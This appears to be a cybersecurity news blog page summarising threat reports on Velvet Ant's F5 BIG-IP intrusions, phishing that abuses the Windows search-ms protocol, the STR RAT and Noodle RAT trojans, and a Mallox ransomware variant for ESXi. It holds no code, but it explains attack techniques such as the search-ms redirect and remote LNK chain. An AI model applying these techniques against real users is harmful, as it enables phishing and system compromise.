Bug Exploit cyber espionage malware Network Security Velvet Ant

Inside the Velvet Ant’s Web: F5 BIG-IP Vulnerabilities Exposed

“Inside the Velvet Ant’s Web: F5 BIG-IP Vulnerabilities Exposed

Cybersecurity threats have evolved beyond traditional attack vectors. One such sophisticated campaign involves the exploitation of F5 BIG-IP appliances by a group known as ‘Velvet Ant.’ In this blog post, we delve into the details of this stealthy data theft operation, shedding light on the techniques employed and the implications for organizations worldwide.

According to a Sygnia report, which discovered the breach after being called in to investigate the cyberattack, Velvet Ant established multiple footholds across the network, including a legacy F5 BIG-IP appliance that served as an internal command and control (C2) server.

The ‘Velvet Ant’ Group

The ‘Velvet Ant’ group, suspected to have ties to Chinese state-sponsored actors, has been active since at least 2017. Their primary focus is on cyber espionage, targeting government entities, defense contractors, and critical infrastructure organizations. Their modus operandi involves gaining persistent access to internal networks, exfiltrating sensitive data, and maintaining long-term presence without detection.

F5 BIG-IP Appliances: A Prime Target

F5 BIG-IP appliances are widely used for load balancing, application delivery, and security functions. Unfortunately, their ubiquity also makes them an attractive target for threat actors. The ‘Velvet Ant’ group leverages vulnerabilities in these devices to achieve their objectives.

The Malware Campaign

  • Initial Compromise: The group gains initial access through known vulnerabilities in F5 BIG-IP devices. These vulnerabilities allow them to bypass authentication and execute arbitrary code.
  • Custom Malware Deployment: Once inside the network, the attackers deploy custom malware tailored for F5 BIG-IP appliances. This malware establishes a covert channel for communication, allowing the group to maintain persistence.
  • Data Exfiltration: The malware exfiltrates sensitive data, including intellectual property, classified documents, and personally identifiable information (PII). The stealthy nature of the operation ensures that data theft remains undetected for extended periods.
  • Lateral Movement: The ‘Velvet Ant’ group moves laterally within the network, escalating privileges and accessing additional resources. They carefully avoid triggering alarms or arousing suspicion.
  • Long-Term Presence: Unlike traditional smash-and-grab attacks, this group aims for longevity. By maintaining a foothold, they can continuously monitor and extract valuable information.

Mitigation Strategies

  • Patch Management: Regularly update F5 BIG-IP devices to address known vulnerabilities. Timely patching reduces the attack surface.
  • Network Segmentation: Isolate critical systems from less secure segments to limit lateral movement.
  • Behavioral Analytics: Implement solutions that detect anomalous behavior within the network. Unusual data flows or unauthorized access attempts should trigger alerts.
  • Threat Intelligence Sharing: Collaborate with industry peers and share threat intelligence. Early detection of emerging threats is crucial.

Read more »
Windows
Explorer malware phishing URI Windows

Phishing Attack Abuses Windows Search Protocol to Deploy Malware

 



A recently developed phishing campaign has emerged, leveraging the Windows Search protocol to deliver malicious scripts to unsuspecting users. This sophisticated attack uses HTML attachments to exploit the search-ms URI, pushing harmful batch files hosted on remote servers.

The Windows Search protocol is a Uniform Resource Identifier (URI) that allows applications to open Windows Explorer and perform searches with specific parameters. Typically, these searches are conducted on the local device’s index. However, attackers have discovered that it’s possible to manipulate Windows Search to query file shares on remote hosts, presenting these remote files as if they were local.

The recent phishing attacks, as detailed in a report by Trustwave SpiderLabs, start with a seemingly innocuous email. The email contains an HTML attachment disguised as an invoice document within a ZIP archive. This ZIP file format helps evade many security and antivirus scanners that might not inspect the contents thoroughly.

Upon opening the HTML file, it uses a `<meta http-equiv="refresh">` tag to automatically redirect the browser to a malicious URL. A clickable anchor tag provides a fallback mechanism if the automatic redirect fails due to browser settings or other reasons. This URL exploits the Windows Search protocol to perform a search on a remote host.

The search parameters in this phishing attack are ingeniously crafted to mislead users. The query searches for items labeled "INVOICE," while the crumb parameter sets the search scope, directing it to a malicious server through Cloudflare. The display name is altered to "Downloads," giving the appearance of a legitimate interface. Additionally, Cloudflare's tunnelling service masks the server, making the remote resources appear as though they are local files.

The search results display a single shortcut (LNK) file named as an invoice. When the victim clicks on this file, it triggers a batch script (BAT) hosted on the same remote server.

The exact operations of the batch script remain unknown, as Trustwave researchers could not analyse it due to the server being offline at the time of their investigation. However, the potential for harmful activities, such as data theft or system compromise, is significant.

To defend against this threat, Trustwave suggests removing registry entries associated with the search-ms/search URI protocol. This can be done by executing specific commands in the registry editor. However, this action should be taken cautiously as it may disrupt legitimate applications and Windows features that rely on this protocol.

This new phishing method highlights the twisted tactics of cybercriminals and the importance of staying vigilant. Users and organisations must be aware of such threats and implement robust security measures to protect against these sophisticated attacks. Regular updates to security protocols and awareness training can help mitigate the risks posed by these kinds of phishing campaigns.


Read more »
Windows
HTML malware Protocols Search Software Windows

New Malware Campaign Exploits Windows Search to Spread

 



A new and intricate alware campaign has been discovered by Trustwave SpiderLabs, leveraging the Windows search feature embedded in HTML code to spread malicious software. The attack begins with a phishing email containing an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed within a ZIP archive. This extra layer of obfuscation reduces the file size for quicker transmission, avoids detection by some email scanners, and adds a step for users, potentially bypassing simpler security measures. Notably, this campaign has been observed in limited instances.


HTML Attachment Mechanics

Once the HTML attachment is opened, it triggers a complex attack by abusing standard web protocols to exploit Windows system functionalities. A critical component of the HTML code is the `<meta http-equiv="refresh"` tag, which automatically reloads the page and redirects to a new URL with zero delay, making the redirection instant and unnoticed by the user. Additionally, an anchor tag serves as a fallback mechanism, ensuring the user is still at risk even if the automatic redirect fails.


Exploitation of the Search Protocol

When the HTML file loads, browsers typically prompt users to allow the search action as a security measure. The redirection URL uses the `search:` protocol, allowing applications to interact directly with Windows Explorer's search function. The attackers exploit this protocol to open Windows Explorer and perform a search with parameters they crafted. These parameters direct the search to look for items labelled as "INVOICE," control the search scope to a specific directory, rename the search display to "Downloads" to appear legitimate, and hide their malicious operations using Cloudflare’s tunnelling service.


Execution of Malicious Files

After the user permits the search action, Windows Explorer retrieves files named "invoice" from a remote server. Only one item, a shortcut (LNK) file, appears in the search results. This LNK file points to a batch script (BAT) hosted on the same server. If the user clicks the file, it could trigger additional malicious operations. At the time of analysis, the payload (BAT) could not be retrieved as the server was down, but the attack demonstrates a sophisticated understanding of exploiting system vulnerabilities and user behaviour.

To prevent exploitation of the `search-ms` and `search` URI protocols, one mitigation strategy is to disable these handlers by deleting the associated registry entries. This can be achieved using specific commands.

This attack surfaces the importance of user awareness and proactive security strategies. While it does not involve automated malware installation, it requires users to engage with various prompts and clicks, cleverly obscuring the attackers' true intent. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.

Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.


Read more »
STR RAT
Credential Theft cybersecurity threat Java Malware keylogging Malicious Payloads malware Phishing Campaigns Remote Access Trojan STR RAT

STR RAT: A Persistent Remote Access Trojan

 

The STR RAT is a remote access trojan (RAT) written in Java, first detected in 2020. Like other RATs, it allows threat actors full control of an infected machine. STR RAT is capable of keylogging, credential theft, and deploying additional malicious payloads. 

The malware is updated annually, aligning with its renewed use by threat actors. Cofense's analysis from January 2023 to April 2024 reveals that 60% of STR RAT samples are delivered directly via email rather than embedded links.

History of STR RAT

STR RAT resembles a seasonal flu, with yearly updates making it more prominent for short periods. Initially discovered on an antivirus forum in 2020, version 1.2 already featured keylogging, password theft, and backdoor access, along with a fake “.crimson” ransomware module that only renamed files. In 2021, Microsoft Threat Intelligence highlighted STR RAT in phishing campaigns. By 2022, it spoofed the Maersk shipping brand and employed a polyglot file technique, allowing execution as an MSI or Java file. In 2023, version 1.6 used Zelix KlassMaster and Allatori for code obfuscation. In 2024, STR RAT was uploaded to legitimate services like GitHub and AWS, making it harder to detect.

STR RAT steals passwords from Chrome, Firefox, Internet Explorer, and email clients like Outlook, Thunderbird, and Foxmail. Key commands include o-keylogger for logging keystrokes, down-n-exec for file execution, remote-screen for commandeering the computer, and power-shell for PowerShell access.

Current Usage and Impact

Though not as prevalent as other RATs like Remcos, STR RAT showed sustained activity from March to August 2023, likely due to the new version and polyglot file technique. In March 2024, significant activity was noted again, attributed to the use of legitimate services like GitHub and AWS for hosting and delivering the malware. STR RAT is typically delivered via email as an archive containing a .jar file, requiring a Java Runtime Environment (JRE) to execute. These archives may also contain necessary JRE binaries or download them from Maven and GitHub repositories.

Delivery Mechanisms

STR RAT's second most common delivery mechanism is loaders, which reach out to a payload location to download and run the malware. Jar Downloaders, CVE-2017-11882 exploits in Microsoft Office, and Windows Registry File downloaders are commonly used loaders. Additionally, embedded URLs in emails or attached PDFs often lead to the malware hosted on legitimate services like AWS, GitHub, and Discord’s CDN.

Unlike loaders, droppers contain the malware to be deployed. STR RAT's most common dropper is the JavaScript Dropper (JS Dropper), a .js file that executes natively on Windows. JS Droppers are usually attached to emails and contain both the dropper and STR RAT.

Behavior and Capabilities

Upon execution, STR RAT places files, creates persistence, and installs dependencies. It uses geolocator services to geo-fingerprint infected computers and sends system information to its command-and-control (C2) server. The malware also uses legitimate Java libraries for keylogging and database connectivity.

Detection and Hunting

Different versions of STR RAT leave various indicators of compromise (IOCs). After execution, STR RAT copies itself to multiple locations, creates a \lib\ folder with legitimate files, and generates a XXXXlock.file in the user's local home profile. The configuration can be observed through memory analysis, revealing the C2 server, port, and domain.

Persistence

STR RAT can create persistence through Registry Run Keys, Startup Folder entries, or Scheduled Tasks, ensuring the malware runs every time the user logs in. Endpoint detection and response software can monitor specific locations for signs of STR RAT persistence.

Network Traffic

STR RAT communicates with C2 servers using subdomains of free dynamic DNS services and legitimate services like GitHub and Maven. HTTP is used for C2 communications, though the port is not the standard tcp/80.

Legitimate Services

STR RAT reaches out to legitimate services for hosting tools and malware. Indicators of suspicious activity include access to GitHub and Maven repositories in conjunction with other malicious behaviors.

By understanding STR RAT's history, capabilities, and delivery mechanisms, cybersecurity professionals can better detect and defend against this persistent threat.
Read more »
Threat Landscape
Chinese Hacker cyber espionage malware RAT Threat Landscape

Chinese Threat Actors Leveraging 'Noodle RAT' Backdoor

 

A backdoor in Executable and Linkable Format (ELF) files used by Chinese hackers has been misidentified as a version of existing malware for years, Trend Micro claimed in a recent analysis. 

In Noodle RAT: Reviewing the New Backdoor utilised by Chinese-Speaking Groups, a blog post based on a Botconf 2024 presentation, Trend Micro Research revealed Noodle RAT, a remote access Trojan employed by Chinese-speaking groups involved in espionage or criminal activity.

Noodle RAT, aka ANGRYREBEL or Nood RAT, has been active since at least 2018. However, it was always regarded as a variant of an existing malware strain, such as Gh0st RAT or Rekoobe.

“For instance, NCC Group released a report on a variant of Gh0st RAT used by Iron Tiger in 2018. Talos released a report on an ELF backdoor used by Rocke (aka Iron Cybercrime Group) in 2018. Sophos released a report on a Linux version of the Gh0st RAT variant used in the Cloud Snooper Campaign in 2018. Positive Technology Security released a report on Calypso RAT used by Calypso APT in 2019,” noted Trend Micro. 

The cybersecurity provider's threat intelligence team revealed that the ELF backdoor mentioned in these reports was actually a new malware strain known as Noodle RAT. 

Noodle RAT: New Malware Strain

Since 2020, the researchers claim to have discovered espionage campaigns employing Noodle RAT that targeted Thailand, India, Japan, Malaysia, and Taiwan. 

The Windows version of Noodle RAT contains several links to Gh0st RAT, a malware strain developed by the C. Rufus Security Team in China and exposed in 2008. For example, Win.NOODLERAT and Gh0st RAT share plugins, and the former employs a slightly similar packet encryption method to that employed by various Gh0st RAT variants, including Gh0stCringe, HiddenGh0st, and Gh0stTimes. 

However, the rest of Win.NOODLERAT and Gh0st RAT's code does not appear to be comparable, prompting Trend Micro to infer that the plugins were simply reused, despite the fact that the backdoor is completely different. 

Additionally, some Linux.NOODLERAT's code is identical to Rekoobe v2018, a backdoor built on Tiny SHell (or tsh) whose source code is freely available on GitHub. Specifically, both use the same reverse shell and process name spoofing techniques. 

“Still, since the rest of the code of Linux.NOODLERAT is totally different from any version of Rekoobe or Tiny SHell, we can conclude that Linux.NOODLERAT should be classified as another malware family,” Trend Micro concluded.
Read more »
VMware
data security Mallox malware Ransomware VMware

Unmasking the Mallox Ransomware Variant: Targeting VMWare ESXi Environments

Unmasking the Mallox Ransomware Variant: Targeting VMWare ESXi Environments

Key highlights

  • The variant specifically checks if a targeted system is running in a VMWare ESXi environment and has administrative rights. If these requirements are not met, it won’t proceed with an attack.
  • The Linux variant uses a custom shell script for payload delivery and execution, a departure from Mallox’s previous methods.
  • The adversary behind this variant is a Mallox affiliate known as “vampire,” suggesting broader campaigns with high ransom demands and extensive IT system targeting.
  • The custom shell also exfiltrates victim information to two different servers, ensuring the ransomware actors have a backup of the data.

The Mallox ransomware group

The Mallox ransomware organization is targeting VMware ESXi setups with a new Linux strain that uses a novel mechanism to transmit and execute its payload only on workstations with high-level user capabilities.

The variant, discovered by Trend Micro researchers who monitor Mallox as TargetCompany, specifically determines whether a targeted system is running in a VMware ESXi environment has administrative rights, and will not launch an attack if these conditions are not met.

Selective targeting and privileged environments

Mallox, also known as Fargo and Tohnichi, first appeared in June 2021 and claims to have infected hundreds of organizations worldwide. The group's targeted sectors include manufacturing, retail, wholesale, legal, and professional services. According to Trend Micro, the most active Mallox sites this year are in Taiwan, India, Thailand, and South Korea.

Custom Shell: Sophisticated attack

The Linux variation is the first time Mallox has been seen employing a customized shell script to deliver and execute ransomware on virtualized environments, indicating that the activity was likely intended to cause more disruption and, as a result, increase the chances of a ransom payment.

Also, the adversary responsible for wielding the variant is a Mallox affiliate known as "vampire," implying the group's involvement in "broader campaigns involving high ransom demands and expansive IT system targeting," Trend Micro's Darrel Tristan Virtusio, Nathaniel Morales, and Cj Arsley Mateo wrote in the post.

Implications

The usage of a customized shell also suggests that Mallox "has been continuously evolving to employ more sophisticated methods in its future attacks," the researchers wrote.

This freshly discovered Linux variant is consistent with the recent trend of ransomware gangs expanding their attacks to important Linux environments, potentially increasing the number of target victims.

On top of to delivery and execution, the unique shell sends the victim's information to two additional servers, allowing the ransomware perpetrators to have a backup. Mallox is reported to have used a leak site with the same name to reveal data obtained during ransomware assaults.

How does the Mallox variant work?

This current variant first examines a system to verify if the executable is executing with administrative privileges; if not, it will not continue its operation.

Following execution, the variation creates a text file named TargetInfo.txt that contains victim information and sends it to a command-and-control (C2) server, similar to the Windows version of Mallox ransomware.

The IP address used to steal this information and later execute the payload was not previously used by Mallox. According to the researchers, it is hosted by China Mobile Communications, a Chinese ISP, and was most likely hired by the threat actor for a brief period to host its malicious payload.

Data extraction strategies

The program also checks to see if the system name matches "vmkernel," indicating that the machine is running VMware's ESXi hypervisor. If that's the case, it uses its encryption process, attaching the ".locked" extension to encrypted files and dropping a ransom letter called HOW TO DECRYPT.txt. The researchers found that both the extension and the note deviate from the Windows variant.

The custom shell script used to download and execute the payload can also exfiltrate data to another server. When the ransomware completes its routine, it reads the contents of the dropped text file and uploads it to another URL

The variation also exports victim information to two distinct sites, possibly "to improve redundancy and have a backup in case a server goes offline or is compromised," the researchers stated.

After the ransomware completes its routine, the script deletes the TargetCompany payload, making it even more difficult for security to determine the full impact of the attack, complicating investigation and incident response.

Linux ESXi environment: Careful of Cyberattacks

Mallox's clever expansion of its assault activities into Linux platforms running VMware ESXi necessitates more vigilance on the part of enterprises fitting this description, according to the researchers.

The researchers proposed that enterprises implement multifactor authentication (MFA) to prevent attackers from executing lateral movement within a network.

Read more »
Subscribe to: Posts (Atom)